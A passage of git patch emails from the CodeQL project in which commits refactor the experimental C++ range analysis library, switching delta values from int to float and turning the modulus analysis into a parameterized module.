e.getBasicBlock() ) or - exists(SemExpr mid, int d1, int d2 | + exists(SemExpr mid, float d1, float d2 | boundFlowStep(e, mid, d1, upper) and // Constants have easy, base-case bounds, so let's not infer any recursive bounds. not e instanceof SemConstantIntegerExpr and @@ -787,7 +823,7 @@ module RangeStage { e = phi.getAUse() ) or - exists(SemExpr mid, int factor, int d | + exists(SemExpr mid, float factor, float d | boundFlowStepMul(e, mid, factor) and not e instanceof SemConstantIntegerExpr and bounded(mid, b, d, upper, fromBackEdge, origdelta, reason) and @@ -795,7 +831,7 @@ module RangeStage { delta = d * factor ) or - exists(SemExpr mid, int factor, int d | + exists(SemExpr mid, float factor, float d | boundFlowStepDiv(e, mid, factor) and not e instanceof SemConstantIntegerExpr and bounded(mid, b, d, upper, fromBackEdge, origdelta, reason) and @@ -811,8 +847,8 @@ module RangeStage { ) or exists( - SemConditionalExpr cond, int d1, int d2, boolean fbe1, boolean fbe2, int od1, int od2, - SemReason r1, SemReason r2 + SemConditionalExpr cond, float d1, float d2, boolean fbe1, boolean fbe2, float od1, + float od2, SemReason r1, SemReason r2 | cond = e and boundedConditionalExpr(cond, b, upper, true, d1, fbe1, od1, r1) and @@ -831,8 +867,8 @@ module RangeStage { } private predicate boundedConditionalExpr( - SemConditionalExpr cond, SemBound b, boolean upper, boolean branch, int delta, - boolean fromBackEdge, int origdelta, SemReason reason + SemConditionalExpr cond, SemBound b, boolean upper, boolean branch, float delta, + boolean fromBackEdge, float origdelta, SemReason reason ) { bounded(cond.getBranchExpr(branch), b, delta, upper, fromBackEdge, origdelta, reason) } From c10733f9264dadb79154f9b5afb80c73ff7ef9b7 Mon Sep 17 00:00:00 2001 From: Robert Marsh Date: Thu, 15 Dec 2022 15:27:48 -0500 Subject: [PATCH 247/381] C++: fix float binding issue in range analysis --- .../cpp/semantic/analysis/RangeAnalysisStage.qll | 15 ++++----------- 1 file changed, 4 insertions(+), 11 deletions(-) diff --git a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll index df49be67643..e0b59c3dddf 100644 --- a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll +++ b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll @@ -131,20 +131,12 @@ private class NarrowingCastExpr extends ConvertOrBoxExpr { signature module DeltaSig { class Delta; - bindingset[d] - bindingset[result] float toFloat(Delta d); - bindingset[d] - bindingset[result] int toInt(Delta d); - bindingset[n] - bindingset[result] Delta fromInt(int n); - bindingset[f] - bindingset[result] Delta fromFloat(float f); } @@ -352,13 +344,14 @@ module RangeStage UtilParam> { or // guard that tests whether `v2` is bounded by `e + delta + d1 - d2` and // exists a guard `guardEq` such that `v = v2 - d1 + d2`. - exists(SemSsaVariable v2, SemGuard guardEq, boolean eqIsTrue, float d1, float d2 | + exists(SemSsaVariable v2, SemGuard guardEq, boolean eqIsTrue, float d1, float d2, float oldDelta | guardEq = UtilParam::semEqFlowCond(v, UtilParam::semSsaRead(v2, D::fromFloat(d1)), D::fromFloat(d2), true, eqIsTrue) and - result = boundFlowCond(v2, e, delta + d1 - d2, upper, testIsTrue) and + result = boundFlowCond(v2, e, oldDelta, upper, testIsTrue) and // guardEq needs to control guard - guardEq.directlyControls(result.getBasicBlock(), eqIsTrue) + guardEq.directlyControls(result.getBasicBlock(), eqIsTrue) and + delta = oldDelta - d1 + d2 ) } From c062d5e206a1c90333ba23cc9b7abd88bd09700a Mon Sep 17 00:00:00 2001 From: Robert Marsh Date: Thu, 15 Dec 2022 16:21:32 -0500 Subject: [PATCH 248/381] C++: move language specific predicates to LangParam --- .../semantic/analysis/RangeAnalysisStage.qll | 63 +++++++++++++------ 1 file changed, 45 insertions(+), 18 deletions(-) diff --git a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll index e0b59c3dddf..3e5d4ec853c 100644 --- a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll +++ b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll @@ -63,7 +63,6 @@ * back-edge as a precise bound might require traversing a loop once). */ -private import RangeAnalysisSpecific as Specific private import RangeUtils as Utils private import SignAnalysisCommon private import ModulusAnalysis @@ -150,9 +149,35 @@ signature module UtilSig { predicate semSsaUpdateStep(SemSsaExplicitUpdate v, SemExpr e, DeltaParam::Delta delta); predicate semValueFlowStep(SemExpr e2, SemExpr e1, DeltaParam::Delta delta); + + /** + * Holds if `e >= bound` (if `upper = false`) or `e <= bound` (if `upper = true`). + */ + predicate hasConstantBound(SemExpr e, int bound, boolean upper); + + /** + * Holds if `e >= bound + delta` (if `upper = false`) or `e <= bound + delta` (if `upper = true`). + */ + predicate hasBound(SemExpr e, SemExpr bound, int delta, boolean upper); + + /** + * Ignore the bound on this expression. + * + * This predicate is to keep the results identical to the original Java implementation. It should be + * removed once we have the new implementation matching the old results exactly. + */ + predicate ignoreExprBound(SemExpr e); + + /** + * Ignore any inferred zero lower bound on this expression. + * + * This predicate is to keep the results identical to the original Java implementation. It should be + * removed once we have the new implementation matching the old results exactly. + */ + predicate ignoreZeroLowerBound(SemExpr e); } -module RangeStage UtilParam> { +module RangeStage LangParam> { cached private module RangeAnalysisCache { cached @@ -178,7 +203,7 @@ module RangeStage UtilParam> { */ cached predicate possibleReason(SemGuard guard) { - guard = boundFlowCond(_, _, _, _, _) or guard = UtilParam::semEqFlowCond(_, _, _, _, _) + guard = boundFlowCond(_, _, _, _, _) or guard = LangParam::semEqFlowCond(_, _, _, _, _) } } @@ -206,11 +231,11 @@ module RangeStage UtilParam> { private predicate boundCondition( SemRelationalExpr comp, SemSsaVariable v, SemExpr e, float delta, boolean upper ) { - comp.getLesserOperand() = UtilParam::semSsaRead(v, D::fromFloat(delta)) and + comp.getLesserOperand() = LangParam::semSsaRead(v, D::fromFloat(delta)) and e = comp.getGreaterOperand() and upper = true or - comp.getGreaterOperand() = UtilParam::semSsaRead(v, D::fromFloat(delta)) and + comp.getGreaterOperand() = LangParam::semSsaRead(v, D::fromFloat(delta)) and e = comp.getLesserOperand() and upper = false or @@ -218,7 +243,7 @@ module RangeStage UtilParam> { // (v - d) - e < c comp.getLesserOperand() = sub and comp.getGreaterOperand() = c and - sub.getLeftOperand() = UtilParam::semSsaRead(v, D::fromFloat(d)) and + sub.getLeftOperand() = LangParam::semSsaRead(v, D::fromFloat(d)) and sub.getRightOperand() = e and upper = true and delta = d + c.getIntValue() @@ -226,7 +251,7 @@ module RangeStage UtilParam> { // (v - d) - e > c comp.getGreaterOperand() = sub and comp.getLesserOperand() = c and - sub.getLeftOperand() = UtilParam::semSsaRead(v, D::fromFloat(d)) and + sub.getLeftOperand() = LangParam::semSsaRead(v, D::fromFloat(d)) and sub.getRightOperand() = e and upper = false and delta = d + c.getIntValue() @@ -235,7 +260,7 @@ module RangeStage UtilParam> { comp.getLesserOperand() = sub and comp.getGreaterOperand() = c and sub.getLeftOperand() = e and - sub.getRightOperand() = UtilParam::semSsaRead(v, D::fromFloat(d)) and + sub.getRightOperand() = LangParam::semSsaRead(v, D::fromFloat(d)) and upper = false and delta = d - c.getIntValue() or @@ -243,7 +268,7 @@ module RangeStage UtilParam> { comp.getGreaterOperand() = sub and comp.getLesserOperand() = c and sub.getLeftOperand() = e and - sub.getRightOperand() = UtilParam::semSsaRead(v, D::fromFloat(d)) and + sub.getRightOperand() = LangParam::semSsaRead(v, D::fromFloat(d)) and upper = true and delta = d - c.getIntValue() ) @@ -339,14 +364,16 @@ module RangeStage UtilParam> { semImplies_v2(result, testIsTrue, boundFlowCond(v, e, delta, upper, testIsTrue0), testIsTrue0) ) or - result = UtilParam::semEqFlowCond(v, e, D::fromFloat(delta), true, testIsTrue) and + result = LangParam::semEqFlowCond(v, e, D::fromFloat(delta), true, testIsTrue) and (upper = true or upper = false) or // guard that tests whether `v2` is bounded by `e + delta + d1 - d2` and // exists a guard `guardEq` such that `v = v2 - d1 + d2`. - exists(SemSsaVariable v2, SemGuard guardEq, boolean eqIsTrue, float d1, float d2, float oldDelta | + exists( + SemSsaVariable v2, SemGuard guardEq, boolean eqIsTrue, float d1, float d2, float oldDelta + | guardEq = - UtilParam::semEqFlowCond(v, UtilParam::semSsaRead(v2, D::fromFloat(d1)), D::fromFloat(d2), + LangParam::semEqFlowCond(v, LangParam::semSsaRead(v2, D::fromFloat(d1)), D::fromFloat(d2), true, eqIsTrue) and result = boundFlowCond(v2, e, oldDelta, upper, testIsTrue) and // guardEq needs to control guard @@ -394,7 +421,7 @@ module RangeStage UtilParam> { SemSsaVariable v, SemSsaReadPosition pos, SemExpr e, float delta, boolean upper, SemReason reason ) { - UtilParam::semSsaUpdateStep(v, e, D::fromFloat(delta)) and + LangParam::semSsaUpdateStep(v, e, D::fromFloat(delta)) and pos.hasReadOfVar(v) and (upper = true or upper = false) and reason = TSemNoReason() @@ -414,7 +441,7 @@ module RangeStage UtilParam> { Utils::getTrackedTypeForSsaVariable(v) instanceof SemIntegerType and exists(SemGuard guard, boolean testIsTrue | pos.hasReadOfVar(v) and - guard = UtilParam::semEqFlowCond(v, e, D::fromFloat(delta), false, testIsTrue) and + guard = LangParam::semEqFlowCond(v, e, D::fromFloat(delta), false, testIsTrue) and semGuardDirectlyControlsSsaRead(guard, pos, testIsTrue) and reason = TSemCondReason(guard) ) @@ -436,7 +463,7 @@ module RangeStage UtilParam> { * - `upper = false` : `e2 >= e1 + delta` */ private predicate boundFlowStep(SemExpr e2, SemExpr e1, float delta, boolean upper) { - UtilParam::semValueFlowStep(e2, e1, D::fromFloat(delta)) and + LangParam::semValueFlowStep(e2, e1, D::fromFloat(delta)) and (upper = true or upper = false) or e2.(SafeCastExpr).getOperand() = e1 and @@ -499,7 +526,7 @@ module RangeStage UtilParam> { delta = 0 and upper = false or - Specific::hasBound(e2, e1, delta, upper) + LangParam::hasBound(e2, e1, delta, upper) } /** Holds if `e2 = e1 * factor` and `factor > 0`. */ @@ -741,13 +768,13 @@ module RangeStage UtilParam> { * (for `upper = false`) bound of `b`. */ private predicate baseBound(SemExpr e, float b, boolean upper) { - Specific::hasConstantBound(e, b, upper) + LangParam::hasConstantBound(e, b, upper) or upper = false and b = 0 and semPositive(e.(SemBitAndExpr).getAnOperand()) and // REVIEW: We let the language opt out here to preserve original results. - not Specific::ignoreZeroLowerBound(e) + not LangParam::ignoreZeroLowerBound(e) } /** From fb1ef07e9f52193448dc4f949ec69e3d1a04fdf4 Mon Sep 17 00:00:00 2001 From: Robert Marsh Date: Fri, 16 Dec 2022 16:00:10 -0500 Subject: [PATCH 249/381] C++: more parameterized modules in range analysis This makes the modulus analysis and sign analysis into parameterized modules which are instantiated in the main range analysis module, and makes RangeAnalysisSpecific and RangeUtils into parameters to the main range analysis. Some classes also need to be moved and made into `instanceof` extensions because they'd otherwise be extending across parameterized module boundaries. --- .../code/cpp/semantic/analysis/FloatDelta.qll | 22 + .../cpp/semantic/analysis/ModulusAnalysis.qll | 599 ++++++------ .../cpp/semantic/analysis/RangeAnalysis.qll | 6 + .../analysis/RangeAnalysisSpecific.qll | 148 +-- .../semantic/analysis/RangeAnalysisStage.qll | 238 +++-- .../code/cpp/semantic/analysis/RangeUtils.qll | 243 ++--- .../semantic/analysis/SignAnalysisCommon.qll | 916 +++++++++--------- 7 files changed, 1157 insertions(+), 1015 deletions(-) create mode 100644 cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/FloatDelta.qll create mode 100644 cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysis.qll diff --git a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/FloatDelta.qll b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/FloatDelta.qll new file mode 100644 index 00000000000..1fe1f59eef8 --- /dev/null +++ b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/FloatDelta.qll @@ -0,0 +1,22 @@ +private import RangeAnalysisStage + +module FloatDelta implements DeltaSig { + class Delta = float; + + bindingset[d] + bindingset[result] + float toFloat(Delta d) {result = d} + + bindingset[d] + bindingset[result] + int toInt(Delta d) {result = d} + + + bindingset[n] + bindingset[result] Delta fromInt(int n) {result = n} + + + bindingset[f] + bindingset[result] Delta fromFloat(float f) {result = f} + } + \ No newline at end of file diff --git a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/ModulusAnalysis.qll b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/ModulusAnalysis.qll index 8f26e85edbd..852dd40aad0 100644 --- a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/ModulusAnalysis.qll +++ b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/ModulusAnalysis.qll @@ -14,321 +14,326 @@ private import ModulusAnalysisSpecific::Private private import experimental.semmle.code.cpp.semantic.Semantic private import ConstantAnalysis private import RangeUtils +private import RangeAnalysisStage -/** - * Holds if `e + delta` equals `v` at `pos`. - */ -private predicate valueFlowStepSsa(SemSsaVariable v, SemSsaReadPosition pos, SemExpr e, int delta) { - semSsaUpdateStep(v, e, delta) and pos.hasReadOfVar(v) - or - exists(SemGuard guard, boolean testIsTrue | - pos.hasReadOfVar(v) and - guard = semEqFlowCond(v, e, delta, true, testIsTrue) and - semGuardDirectlyControlsSsaRead(guard, pos, testIsTrue) - ) -} - -/** - * Holds if `add` is the addition of `larg` and `rarg`, neither of which are - * `ConstantIntegerExpr`s. - */ -private predicate nonConstAddition(SemExpr add, SemExpr larg, SemExpr rarg) { - exists(SemAddExpr a | a = add | - larg = a.getLeftOperand() and - rarg = a.getRightOperand() - ) and - not larg instanceof SemConstantIntegerExpr and - not rarg instanceof SemConstantIntegerExpr -} - -/** - * Holds if `sub` is the subtraction of `larg` and `rarg`, where `rarg` is not - * a `ConstantIntegerExpr`. - */ -private predicate nonConstSubtraction(SemExpr sub, SemExpr larg, SemExpr rarg) { - exists(SemSubExpr s | s = sub | - larg = s.getLeftOperand() and - rarg = s.getRightOperand() - ) and - not rarg instanceof SemConstantIntegerExpr -} - -/** Gets an expression that is the remainder modulo `mod` of `arg`. */ -private SemExpr modExpr(SemExpr arg, int mod) { - exists(SemRemExpr rem | - result = rem and - arg = rem.getLeftOperand() and - rem.getRightOperand().(SemConstantIntegerExpr).getIntValue() = mod and - mod >= 2 - ) - or - exists(SemConstantIntegerExpr c | - mod = 2.pow([1 .. 30]) and - c.getIntValue() = mod - 1 and - result.(SemBitAndExpr).hasOperands(arg, c) - ) -} - -/** - * Gets a guard that tests whether `v` is congruent with `val` modulo `mod` on - * its `testIsTrue` branch. - */ -private SemGuard moduloCheck(SemSsaVariable v, int val, int mod, boolean testIsTrue) { - exists(SemExpr rem, SemConstantIntegerExpr c, int r, boolean polarity | - result.isEquality(rem, c, polarity) and - c.getIntValue() = r and - rem = modExpr(v.getAUse(), mod) and - ( - testIsTrue = polarity and val = r - or - testIsTrue = polarity.booleanNot() and - mod = 2 and - val = 1 - r and - (r = 0 or r = 1) - ) - ) -} - -/** - * Holds if a guard ensures that `v` at `pos` is congruent with `val` modulo `mod`. - */ -private predicate moduloGuardedRead(SemSsaVariable v, SemSsaReadPosition pos, int val, int mod) { - exists(SemGuard guard, boolean testIsTrue | - pos.hasReadOfVar(v) and - guard = moduloCheck(v, val, mod, testIsTrue) and - semGuardControlsSsaRead(guard, pos, testIsTrue) - ) -} - -/** Holds if `factor` is a power of 2 that divides `mask`. */ -bindingset[mask] -private predicate andmaskFactor(int mask, int factor) { - mask % factor = 0 and - factor = 2.pow([1 .. 30]) -} - -/** Holds if `e` is evenly divisible by `factor`. */ -private predicate evenlyDivisibleExpr(SemExpr e, int factor) { - exists(SemConstantIntegerExpr c, int k | k = c.getIntValue() | - e.(SemMulExpr).getAnOperand() = c and factor = k.abs() and factor >= 2 - or - e.(SemShiftLeftExpr).getRightOperand() = c and factor = 2.pow(k) and k > 0 - or - e.(SemBitAndExpr).getAnOperand() = c and factor = max(int f | andmaskFactor(k, f)) - ) -} - -/** - * Holds if `rix` is the number of input edges to `phi`. - */ -private predicate maxPhiInputRank(SemSsaPhiNode phi, int rix) { - rix = max(int r | rankedPhiInput(phi, _, _, r)) -} - -/** - * Gets the remainder of `val` modulo `mod`. - * - * For `mod = 0` the result equals `val` and for `mod > 1` the result is within - * the range `[0 .. mod-1]`. - */ -bindingset[val, mod] -private int remainder(int val, int mod) { - mod = 0 and result = val - or - mod > 1 and result = ((val % mod) + mod) % mod -} - -/** - * Holds if `inp` is an input to `phi` and equals `phi` modulo `mod` along `edge`. - */ -private predicate phiSelfModulus( - SemSsaPhiNode phi, SemSsaVariable inp, SemSsaReadPositionPhiInputEdge edge, int mod -) { - exists(SemSsaBound phibound, int v, int m | - edge.phiInput(phi, inp) and - phibound.getAVariable() = phi and - ssaModulus(inp, edge, phibound, v, m) and - mod = m.gcd(v) and - mod != 1 - ) -} - -/** - * Holds if `b + val` modulo `mod` is a candidate congruence class for `phi`. - */ -private predicate phiModulusInit(SemSsaPhiNode phi, SemBound b, int val, int mod) { - exists(SemSsaVariable inp, SemSsaReadPositionPhiInputEdge edge | - edge.phiInput(phi, inp) and - ssaModulus(inp, edge, b, val, mod) - ) -} - -/** - * Holds if all inputs to `phi` numbered `1` to `rix` are equal to `b + val` modulo `mod`. - */ -pragma[nomagic] -private predicate phiModulusRankStep(SemSsaPhiNode phi, SemBound b, int val, int mod, int rix) { - /* - * base case. If any phi input is equal to `b + val` modulo `mod`, that's a potential congruence - * class for the phi node. +module ModulusAnalysis U> { + /** + * Holds if `e + delta` equals `v` at `pos`. */ + private predicate valueFlowStepSsa(SemSsaVariable v, SemSsaReadPosition pos, SemExpr e, int delta) { + U::semSsaUpdateStep(v, e, D::fromInt(delta)) and pos.hasReadOfVar(v) + or + exists(SemGuard guard, boolean testIsTrue | + pos.hasReadOfVar(v) and + guard = U::semEqFlowCond(v, e, D::fromInt(delta), true, testIsTrue) and + semGuardDirectlyControlsSsaRead(guard, pos, testIsTrue) + ) + } - rix = 0 and - phiModulusInit(phi, b, val, mod) - or - exists(SemSsaVariable inp, SemSsaReadPositionPhiInputEdge edge, int v1, int m1 | - mod != 1 and - val = remainder(v1, mod) - | + /** + * Holds if `add` is the addition of `larg` and `rarg`, neither of which are + * `ConstantIntegerExpr`s. + */ + private predicate nonConstAddition(SemExpr add, SemExpr larg, SemExpr rarg) { + exists(SemAddExpr a | a = add | + larg = a.getLeftOperand() and + rarg = a.getRightOperand() + ) and + not larg instanceof SemConstantIntegerExpr and + not rarg instanceof SemConstantIntegerExpr + } + + /** + * Holds if `sub` is the subtraction of `larg` and `rarg`, where `rarg` is not + * a `ConstantIntegerExpr`. + */ + private predicate nonConstSubtraction(SemExpr sub, SemExpr larg, SemExpr rarg) { + exists(SemSubExpr s | s = sub | + larg = s.getLeftOperand() and + rarg = s.getRightOperand() + ) and + not rarg instanceof SemConstantIntegerExpr + } + + /** Gets an expression that is the remainder modulo `mod` of `arg`. */ + private SemExpr modExpr(SemExpr arg, int mod) { + exists(SemRemExpr rem | + result = rem and + arg = rem.getLeftOperand() and + rem.getRightOperand().(SemConstantIntegerExpr).getIntValue() = mod and + mod >= 2 + ) + or + exists(SemConstantIntegerExpr c | + mod = 2.pow([1 .. 30]) and + c.getIntValue() = mod - 1 and + result.(SemBitAndExpr).hasOperands(arg, c) + ) + } + + /** + * Gets a guard that tests whether `v` is congruent with `val` modulo `mod` on + * its `testIsTrue` branch. + */ + private SemGuard moduloCheck(SemSsaVariable v, int val, int mod, boolean testIsTrue) { + exists(SemExpr rem, SemConstantIntegerExpr c, int r, boolean polarity | + result.isEquality(rem, c, polarity) and + c.getIntValue() = r and + rem = modExpr(v.getAUse(), mod) and + ( + testIsTrue = polarity and val = r + or + testIsTrue = polarity.booleanNot() and + mod = 2 and + val = 1 - r and + (r = 0 or r = 1) + ) + ) + } + + /** + * Holds if a guard ensures that `v` at `pos` is congruent with `val` modulo `mod`. + */ + private predicate moduloGuardedRead(SemSsaVariable v, SemSsaReadPosition pos, int val, int mod) { + exists(SemGuard guard, boolean testIsTrue | + pos.hasReadOfVar(v) and + guard = moduloCheck(v, val, mod, testIsTrue) and + semGuardControlsSsaRead(guard, pos, testIsTrue) + ) + } + + /** Holds if `factor` is a power of 2 that divides `mask`. */ + bindingset[mask] + private predicate andmaskFactor(int mask, int factor) { + mask % factor = 0 and + factor = 2.pow([1 .. 30]) + } + + /** Holds if `e` is evenly divisible by `factor`. */ + private predicate evenlyDivisibleExpr(SemExpr e, int factor) { + exists(SemConstantIntegerExpr c, int k | k = c.getIntValue() | + e.(SemMulExpr).getAnOperand() = c and factor = k.abs() and factor >= 2 + or + e.(SemShiftLeftExpr).getRightOperand() = c and factor = 2.pow(k) and k > 0 + or + e.(SemBitAndExpr).getAnOperand() = c and factor = max(int f | andmaskFactor(k, f)) + ) + } + + /** + * Holds if `rix` is the number of input edges to `phi`. + */ + private predicate maxPhiInputRank(SemSsaPhiNode phi, int rix) { + rix = max(int r | rankedPhiInput(phi, _, _, r)) + } + + /** + * Gets the remainder of `val` modulo `mod`. + * + * For `mod = 0` the result equals `val` and for `mod > 1` the result is within + * the range `[0 .. mod-1]`. + */ + bindingset[val, mod] + private int remainder(int val, int mod) { + mod = 0 and result = val + or + mod > 1 and result = ((val % mod) + mod) % mod + } + + /** + * Holds if `inp` is an input to `phi` and equals `phi` modulo `mod` along `edge`. + */ + private predicate phiSelfModulus( + SemSsaPhiNode phi, SemSsaVariable inp, SemSsaReadPositionPhiInputEdge edge, int mod + ) { + exists(SemSsaBound phibound, int v, int m | + edge.phiInput(phi, inp) and + phibound.getAVariable() = phi and + ssaModulus(inp, edge, phibound, v, m) and + mod = m.gcd(v) and + mod != 1 + ) + } + + /** + * Holds if `b + val` modulo `mod` is a candidate congruence class for `phi`. + */ + private predicate phiModulusInit(SemSsaPhiNode phi, SemBound b, int val, int mod) { + exists(SemSsaVariable inp, SemSsaReadPositionPhiInputEdge edge | + edge.phiInput(phi, inp) and + ssaModulus(inp, edge, b, val, mod) + ) + } + + /** + * Holds if all inputs to `phi` numbered `1` to `rix` are equal to `b + val` modulo `mod`. + */ + pragma[nomagic] + private predicate phiModulusRankStep(SemSsaPhiNode phi, SemBound b, int val, int mod, int rix) { /* - * Recursive case. If `inp` = `b + v2` mod `m2`, we combine that with the preceding potential - * congruence class `b + v1` mod `m1`. The result will be the congruence class of `v1` modulo - * the greatest common denominator of `m1`, `m2`, and `v1 - v2`. + * base case. If any phi input is equal to `b + val` modulo `mod`, that's a potential congruence + * class for the phi node. */ - exists(int v2, int m2 | - rankedPhiInput(pragma[only_bind_out](phi), inp, edge, rix) and - phiModulusRankStep(phi, b, v1, m1, rix - 1) and - ssaModulus(inp, edge, b, v2, m2) and - mod = m1.gcd(m2).gcd(v1 - v2) + rix = 0 and + phiModulusInit(phi, b, val, mod) + or + exists(SemSsaVariable inp, SemSsaReadPositionPhiInputEdge edge, int v1, int m1 | + mod != 1 and + val = remainder(v1, mod) + | + /* + * Recursive case. If `inp` = `b + v2` mod `m2`, we combine that with the preceding potential + * congruence class `b + v1` mod `m1`. The result will be the congruence class of `v1` modulo + * the greatest common denominator of `m1`, `m2`, and `v1 - v2`. + */ + + exists(int v2, int m2 | + rankedPhiInput(pragma[only_bind_out](phi), inp, edge, rix) and + phiModulusRankStep(phi, b, v1, m1, rix - 1) and + ssaModulus(inp, edge, b, v2, m2) and + mod = m1.gcd(m2).gcd(v1 - v2) + ) + or + /* + * Recursive case. If `inp` = `phi` mod `m2`, we combine that with the preceding potential + * congruence class `b + v1` mod `m1`. The result will be a congruence class modulo the greatest + * common denominator of `m1` and `m2`. + */ + + exists(int m2 | + rankedPhiInput(phi, inp, edge, rix) and + phiModulusRankStep(phi, b, v1, m1, rix - 1) and + phiSelfModulus(phi, inp, edge, m2) and + mod = m1.gcd(m2) + ) ) - or - /* - * Recursive case. If `inp` = `phi` mod `m2`, we combine that with the preceding potential - * congruence class `b + v1` mod `m1`. The result will be a congruence class modulo the greatest - * common denominator of `m1` and `m2`. - */ + } - exists(int m2 | - rankedPhiInput(phi, inp, edge, rix) and - phiModulusRankStep(phi, b, v1, m1, rix - 1) and - phiSelfModulus(phi, inp, edge, m2) and - mod = m1.gcd(m2) + /** + * Holds if `phi` is equal to `b + val` modulo `mod`. + */ + private predicate phiModulus(SemSsaPhiNode phi, SemBound b, int val, int mod) { + exists(int r | + maxPhiInputRank(phi, r) and + phiModulusRankStep(phi, b, val, mod, r) ) - ) -} + } -/** - * Holds if `phi` is equal to `b + val` modulo `mod`. - */ -private predicate phiModulus(SemSsaPhiNode phi, SemBound b, int val, int mod) { - exists(int r | - maxPhiInputRank(phi, r) and - phiModulusRankStep(phi, b, val, mod, r) - ) -} - -/** - * Holds if `v` at `pos` is equal to `b + val` modulo `mod`. - */ -private predicate ssaModulus(SemSsaVariable v, SemSsaReadPosition pos, SemBound b, int val, int mod) { - phiModulus(v, b, val, mod) and pos.hasReadOfVar(v) - or - b.(SemSsaBound).getAVariable() = v and pos.hasReadOfVar(v) and val = 0 and mod = 0 - or - exists(SemExpr e, int val0, int delta | - semExprModulus(e, b, val0, mod) and - valueFlowStepSsa(v, pos, e, delta) and - val = remainder(val0 + delta, mod) - ) - or - moduloGuardedRead(v, pos, val, mod) and b instanceof SemZeroBound -} - -/** - * Holds if `e` is equal to `b + val` modulo `mod`. - * - * There are two cases for the modulus: - * - `mod = 0`: The equality `e = b + val` is an ordinary equality. - * - `mod > 1`: `val` lies within the range `[0 .. mod-1]`. - */ -cached -predicate semExprModulus(SemExpr e, SemBound b, int val, int mod) { - not ignoreExprModulus(e) and - ( - e = b.getExpr(val) and mod = 0 + /** + * Holds if `v` at `pos` is equal to `b + val` modulo `mod`. + */ + private predicate ssaModulus( + SemSsaVariable v, SemSsaReadPosition pos, SemBound b, int val, int mod + ) { + phiModulus(v, b, val, mod) and pos.hasReadOfVar(v) or - evenlyDivisibleExpr(e, mod) and - val = 0 and - b instanceof SemZeroBound + b.(SemSsaBound).getAVariable() = v and pos.hasReadOfVar(v) and val = 0 and mod = 0 or - exists(SemSsaVariable v, SemSsaReadPositionBlock bb | - ssaModulus(v, bb, b, val, mod) and - e = v.getAUse() and - bb.getAnExpr() = e - ) - or - exists(SemExpr mid, int val0, int delta | - semExprModulus(mid, b, val0, mod) and - semValueFlowStep(e, mid, delta) and + exists(SemExpr e, int val0, int delta | + semExprModulus(e, b, val0, mod) and + valueFlowStepSsa(v, pos, e, delta) and val = remainder(val0 + delta, mod) ) or - exists(SemConditionalExpr cond, int v1, int v2, int m1, int m2 | - cond = e and - condExprBranchModulus(cond, true, b, v1, m1) and - condExprBranchModulus(cond, false, b, v2, m2) and - mod = m1.gcd(m2).gcd(v1 - v2) and - mod != 1 and - val = remainder(v1, mod) - ) - or - exists(SemBound b1, SemBound b2, int v1, int v2, int m1, int m2 | - addModulus(e, true, b1, v1, m1) and - addModulus(e, false, b2, v2, m2) and - mod = m1.gcd(m2) and - mod != 1 and - val = remainder(v1 + v2, mod) - | - b = b1 and b2 instanceof SemZeroBound + moduloGuardedRead(v, pos, val, mod) and b instanceof SemZeroBound + } + + /** + * Holds if `e` is equal to `b + val` modulo `mod`. + * + * There are two cases for the modulus: + * - `mod = 0`: The equality `e = b + val` is an ordinary equality. + * - `mod > 1`: `val` lies within the range `[0 .. mod-1]`. + */ + cached + predicate semExprModulus(SemExpr e, SemBound b, int val, int mod) { + not ignoreExprModulus(e) and + ( + e = b.getExpr(val) and mod = 0 or - b = b2 and b1 instanceof SemZeroBound + evenlyDivisibleExpr(e, mod) and + val = 0 and + b instanceof SemZeroBound + or + exists(SemSsaVariable v, SemSsaReadPositionBlock bb | + ssaModulus(v, bb, b, val, mod) and + e = v.getAUse() and + bb.getAnExpr() = e + ) + or + exists(SemExpr mid, int val0, int delta | + semExprModulus(mid, b, val0, mod) and + U::semValueFlowStep(e, mid, D::fromInt(delta)) and + val = remainder(val0 + delta, mod) + ) + or + exists(SemConditionalExpr cond, int v1, int v2, int m1, int m2 | + cond = e and + condExprBranchModulus(cond, true, b, v1, m1) and + condExprBranchModulus(cond, false, b, v2, m2) and + mod = m1.gcd(m2).gcd(v1 - v2) and + mod != 1 and + val = remainder(v1, mod) + ) + or + exists(SemBound b1, SemBound b2, int v1, int v2, int m1, int m2 | + addModulus(e, true, b1, v1, m1) and + addModulus(e, false, b2, v2, m2) and + mod = m1.gcd(m2) and + mod != 1 and + val = remainder(v1 + v2, mod) + | + b = b1 and b2 instanceof SemZeroBound + or + b = b2 and b1 instanceof SemZeroBound + ) + or + exists(int v1, int v2, int m1, int m2 | + subModulus(e, true, b, v1, m1) and + subModulus(e, false, any(SemZeroBound zb), v2, m2) and + mod = m1.gcd(m2) and + mod != 1 and + val = remainder(v1 - v2, mod) + ) ) - or - exists(int v1, int v2, int m1, int m2 | - subModulus(e, true, b, v1, m1) and - subModulus(e, false, any(SemZeroBound zb), v2, m2) and - mod = m1.gcd(m2) and - mod != 1 and - val = remainder(v1 - v2, mod) + } + + private predicate condExprBranchModulus( + SemConditionalExpr cond, boolean branch, SemBound b, int val, int mod + ) { + semExprModulus(cond.getBranchExpr(branch), b, val, mod) + } + + private predicate addModulus(SemExpr add, boolean isLeft, SemBound b, int val, int mod) { + exists(SemExpr larg, SemExpr rarg | nonConstAddition(add, larg, rarg) | + semExprModulus(larg, b, val, mod) and isLeft = true + or + semExprModulus(rarg, b, val, 